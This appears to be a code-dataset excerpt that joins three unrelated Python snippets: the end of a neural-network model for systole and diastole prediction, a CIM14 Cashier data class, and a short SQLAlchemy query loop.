lddia3sigma = nn.layers.DenseLayer(lddia2drop, num_units=1, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(50.0), nonlinearity=lb_softplus(3))
lddia3musigma = nn.layers.ConcatLayer([lddia3mu, lddia3sigma], axis=1)
l_diastole = layers.MuSigmaErfLayer(lddia3musigma)
return {
"inputs":{
"sliced:data:singleslice": l0
},
"outputs": {
"systole": l_systole,
"diastole": l_diastole,
},
"regularizable": {
ldsys1: l2_weight,
ldsys2: l2_weight,
ldsys3mu: l2_weight_out,
ldsys3sigma: l2_weight_out,
lddia1: l2_weight,
lddia2: l2_weight,
lddia3mu: l2_weight_out,
lddia3sigma: l2_weight_out,
},
"meta_outputs":{
"systole:mu": ldsys3mu,
"systole:sigma": ldsys3sigma,
"diastole:mu": lddia3mu,
"diastole:sigma": lddia3sigma,
"systole": ldsys2,
"diastole": lddia2,
}
}
|
from CIM14.IEC61970.Core.IdentifiedObject import IdentifiedObject
class Cashier(IdentifiedObject):
"""The operator of the point of sale for the duration of CashierShift. Cashier is under the exclusive management control of Vendor.
"""
def __init__(self, CashierShifts=None, electronicAddress=None, Vendor=None, *args, **kw_args):
"""Initialises a new 'Cashier' instance.
@param CashierShifts: All shifts operated by this cashier.
@param electronicAddress: Electronic address.
@param Vendor: Vendor that manages this Cachier.
"""
self._CashierShifts = []
self.CashierShifts = [] if CashierShifts is None else CashierShifts
self.electronicAddress = electronicAddress
self._Vendor = None
self.Vendor = Vendor
super(Cashier, self).__init__(*args, **kw_args)
_attrs = []
_attr_types = {}
_defaults = {}
_enums = {}
_refs = ["CashierShifts", "electronicAddress", "Vendor"]
_many_refs = ["CashierShifts"]
def getCashierShifts(self):
"""All shifts operated by this cashier.
"""
return self._CashierShifts
def setCashierShifts(self, value):
for x in self._CashierShifts:
x.Cashier = None
for y in value:
y._Cashier = self
self._CashierShifts = value
CashierShifts = property(getCashierShifts, setCashierShifts)
def addCashierShifts(self, *CashierShifts):
for obj in CashierShifts:
obj.Cashier = self
def removeCashierShifts(self, *CashierShifts):
for obj in CashierShifts:
obj.Cashier = None
# Electronic address.
electronicAddress = None
def getVendor(self):
"""Vendor that manages this Cachier.
"""
return self._Vendor
def setVendor(self, value):
if self._Vendor is not None:
filtered = [x for x in self.Vendor.Cashiers if x != self]
self._Vendor._Cashiers = filtered
self._Vendor = value
if self._Vendor is not None:
if self not in self._Vendor._Cashiers:
self._Vendor._Cashiers.append(self)
Vendor = property(getVendor, setVendor)
|
from sqlalchemy_inventory_definition import session, OperatingSystem
for os in session.query(OperatingSystem):
print (os)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.